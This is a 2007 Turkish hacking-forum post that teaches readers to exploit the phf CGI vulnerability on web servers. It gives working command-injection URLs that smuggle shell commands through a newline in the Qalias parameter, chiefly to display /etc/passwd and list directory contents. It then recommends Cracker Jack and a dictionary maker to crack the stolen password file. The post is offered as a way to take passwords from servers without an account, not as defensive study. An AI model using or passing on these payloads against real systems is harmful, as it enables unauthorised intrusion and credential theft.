PortalliPortalli  ForumForum  AnasayfaAnasayfa  TakvimTakvim  SSSSSS  AramaArama  Kayıt OlKayıt Ol  Üye ListesiÜye Listesi  Kullanıcı GruplarıKullanıcı Grupları  YöneticilerYöneticiler  Giriş yap  

Paylaş | 
 

 Http Uzerinden Sifre Alma

Aşağa gitmek 
YazarMesaj
H@CKER
HTT Üyesi
HTT Üyesi
avatar

Erkek
Mesaj Sayısı : 468
Şehir : www.hackturkiye.ile.biz
Meslek : H@CKER\'LİK
Kayıt tarihi : 12/08/07

MesajKonu: Http Uzerinden Sifre Alma   Ptsi Ağus. 20, 2007 2:44 pm

Bu yazida daha basit ama
daha hizli bir hack yontemini anlatcam
Bu yontem cok hosunuza gidecek
Gerekli Programlar : Internet Explorer
haricinde bir web browser, Cracker Jack
ve tabiki Meliksah Ozoral's Dict Maker.

Mantik : phf sistemlerde bulunan bir
acikdir ve bu acik sayesinde sisteme
web uzerinden baglanip shellde bazi
komutlari calistirabilirsiniz...
Not : Calistirdiginiz komutlar cd,
ls, cat gibi komutlar silme islemlerini
phf uzerinden yapamiyorsunuz...

Ozellikler : phf sayesinde her hangi
bir serverdan elinizde acc olmadan
passwd dosyasini alabilir ve k
irabilirsiniz...Bu olay web uzerinden
olur ve hizli olur |~ eNJOy!

Kullanim : phf nin kullanimi basitdir,
sizi fazla zorlamaz.
browsera girdiginiz adresin sonu asagidaki
satiri yazarsaniz "passwd" dosyasini
browser penceresinde gorursunuz...
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Bu satirin mantigi sudur...
Asagidaki satir phf olayini acar...
/cgi-bin/phf?Qalias=x%0a
Bu satirdan sonra yazacaginiz komutlar
sistem uzerinde calistirilir...
ornegin :
cat%20/etc/passwd
etc dizinin altindaki passwd dosyasini
goruntuler burda %20 bosluk oldugunu
belirtir yani :
/cgi-bin/phf?Qalias=x%0als
yazarsaniz bulundugunuz dizindeki dosyalar
goruntulenir...
/cgi-bin/phf?Qalias=x%0als%20pass*
yazarsaniz bulundugunuz dizinde
pass ile baslayan butun dosyalari listeler...
Komutun Kullanimi Kolay!
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör
 
Http Uzerinden Sifre Alma
Sayfa başına dön 
1 sayfadaki 1 sayfası
 Similar topics
-
» amdan kılları alma yöntemi

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
 ::  :: WEB Security-
Buraya geçin: